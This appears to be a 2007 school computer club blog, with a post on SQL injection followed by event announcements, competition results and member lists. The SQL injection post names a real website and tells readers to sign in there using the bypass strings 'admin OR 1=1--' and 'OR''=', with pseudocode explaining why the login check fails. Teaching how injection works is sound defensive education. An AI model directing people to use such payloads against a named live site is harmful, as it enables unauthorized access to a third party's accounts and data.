SQL Injection attacks

Uncategorized

One of the most prominent loopholes, which almost every site has, is an SQL security loophole. Sites that use the SQL database system are the ones vulnerable to it.
An SQL Injection Attack is a form of attack that comes from user input that remains unchecked on the user end. The objective is to fool the database system into running malicious code that will reveal sensitive information or otherwise compromise the server.
There are two main types of attacks. First-order attacks are when the attacker receives the desired result immediately, either by direct response from the application he is interacting with or by some other response mechanism, such as e-mail. Second-order attacks are when the attacker injects some data that will reside in the database, but the payload is not immediately activated.

To be very precise, it gives you the source of the files where all the important data is stored.
Here is an example-

1) Open the following site: http://www.sanjeevkapoor.com/ : I have already informed the administrator about the loopholes through a letter also, but no action has been taken.
2) Click on sign in and type the username as: admin OR 1=1—and password as: ‘OR”=’
Now you see how powerful this Injection Attack is. For me to explain how this happened, you need to know some amount of SQL. So this is what actually happens when you supply a password and login to a logon form.
SQLQuery=”SELECT Username FROM Users WHERE Username=’” & StrUsername & “ ‘ AND Password=’ “ & Strpassword & “ ‘ “
StrAuthcheck= GetqueryResult(SQL query)
If strAuthenticated=” “ then
Boolauthenticated=False
Else
Boolauthenticated= True
The logon and password actually form an SQL query, which goes through the user’s table, and tries to find a match for the username and password you supplied. If a match is found then a string is stored in a variable (strauthcheck) but if this string remains empty then you are not authorized. So by using the SQL queries like 1=1—(which means one is equal to one) you are able to fool the SQL sever which is actually checking for authentication.

Article by : – Ankit Srivastava
                       Head, Network Security – Exunclan

CV Raman and Bhaskara Trophy

Uncategorized
Bluebells School, Kailash Colony is organising a Science Symposium for the CV Raman and Bhaskara Trophy on July 31, 2007. One speaker and two presenters are required for the same.

A 5 minute presentation needs to be made on the topic “Technology of Mobile Connectivity” on either PowerPoint or Flash MX. If it is made on any other software, then the participants will have to bring the software with them for the event.

All those interested please give in your names before July 20, 2007.

Mata Jai Kaur Public School result

Uncategorized

Senior Event

  • Quiz
    Kartikeya Asthana
    Ananth Govind Rajan
  • Programming (C++, VB)
    Aayush Kumar
    Shikhar
  • CEO Hunt
    Aayush Kumar

    Junior Events

  • Mobile Phone Website
    Tanay Padhi
    Dwarkesh
  • Treasure Hunt
    Aditya Jain
    Sakshi Gupta
  • Video Editing

    Sub Junior Events

  • Junior Quiz
    Shubham Goel
    Rishabh Marya
  • Futuristic Gizmo
    Shubham Goel
    Tanay Padhi

Tech-Edge 2007

Uncategorized

Tech Edge 2007 is being organized at Birla Vidya Niketan on the 25th of July. The following students will be participating in the event:-

1.Collage Making

  • Aditya Jain
  • Saakshi

2.Web Designing

  • Shubham Goel
  • Rishabh Marya

(Topics (i)Life in space (ii)Latest technology (iii)Indian Heritage. The teams should submit a copy of their website in a CD by 21st July.)

3.Senior Programming

  • Anant Jain
  • Abhijit Das

4.Multimedia Presentation

  • Rishabh Marya
  • Shubham Goel

( The topic for the presentation is (i) XBOX 360 (ii)Robocop . Teams should submit a copy of their presentation in CD on any one of the above topic by 21st July.The softwares to be used are (i)Frontpage (ii)Flash )

Urgent: Exun Member Photos

Uncategorized

The following members must report on Thursday (12 July) during BREAK for their photos to be taken for the exunclan website:

Radhika Malik
Ankit Srivastava
Kunal Singh
Akshay Talwar
Srajan Mani Rastogi
Ananth Govind Rajan
Nachiketa Dash
Kanika Singh
Mini Saxena
R. Dwarkesh
Shubham Goel
Rishabh Marya
Tanay Padhi
Adideva Sekhri
Utkarsh Ohm

All members are also requested to update their details (contact info, class, section, etc) in the Exun Members Google spreadsheet.

Meeting

Uncategorized

An Exun meeting is scheduled on Thursday, the 12th of July during BREAK to finalize teams for the computer symposium which is being held at Mata Jai Kaur Public School. All Exun members must report.

See you there!

Update Ordinatrix 2007

Uncategorized

Teams for the event have been finalized. Anybody having experience or is interested for the fourth spot in the Movie@trix team should comment away. Participants are:

Movie@trix:
1. Kartikeya Asthana
2. Sahil Bajaj
3. Aviral Goel
4. Aayush Kumar

Anim@trix:
1. Shubham Goel
2. Rishabh Marya

Tunes@trix:
1. Saumya Kharbanda

Ngage@trix:
1. Digvijay Singh
2. Arjun Kumar